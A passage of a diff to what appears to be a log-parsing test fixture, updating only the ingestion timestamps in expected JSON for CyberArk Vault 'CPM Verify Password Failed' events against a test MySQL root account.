Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1029,7 +974,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-06-09T10:24:34.493925300Z", + "ingested": "2021-12-09T13:37:01.193642600Z", "original": "\u003c7\u003e1 2021-03-15T17:10:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:10:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:10:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615828174\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"DSN=mariadb;TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:10:25\",\"IsoTimestamp\":\"2021-03-15T17:10:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615828174\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"DSN=mariadb;TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1140,7 +1085,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-06-09T10:24:34.493927800Z", + "ingested": "2021-12-09T13:37:01.193648300Z", "original": "\u003c7\u003e1 2021-03-15T17:28:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:28:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:28:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829287\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:28:07\",\"IsoTimestamp\":\"2021-03-15T17:28:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829287\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1253,7 +1198,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-06-09T10:24:34.493929900Z", + "ingested": "2021-12-09T13:37:01.193654Z", "original": "\u003c7\u003e1 2021-03-15T17:33:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:33:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:33:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829597\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mysql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:33:17\",\"IsoTimestamp\":\"2021-03-15T17:33:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829597\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"mysql\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1366,7 +1311,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-06-09T10:24:34.493932Z", + "ingested": "2021-12-09T13:37:01.193660Z", "original": "\u003c7\u003e1 2021-03-15T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829907\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:38:27\",\"IsoTimestamp\":\"2021-03-15T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829907\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1475,7 +1420,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-06-09T10:24:34.493934Z", + "ingested": "2021-12-09T13:37:01.193665900Z", "original": "\u003c7\u003e1 2021-03-15T18:00:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:00:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:00:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=Driver\\\\={MySQL ODBC 5.3 Unicode Driver}\\\\;server\\\\=127.0.0.1\\\\;user\\\\=root\\\\;option\\\\=3\\\\;port\\\\=3306\\\\;Password\\\\=1234;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" 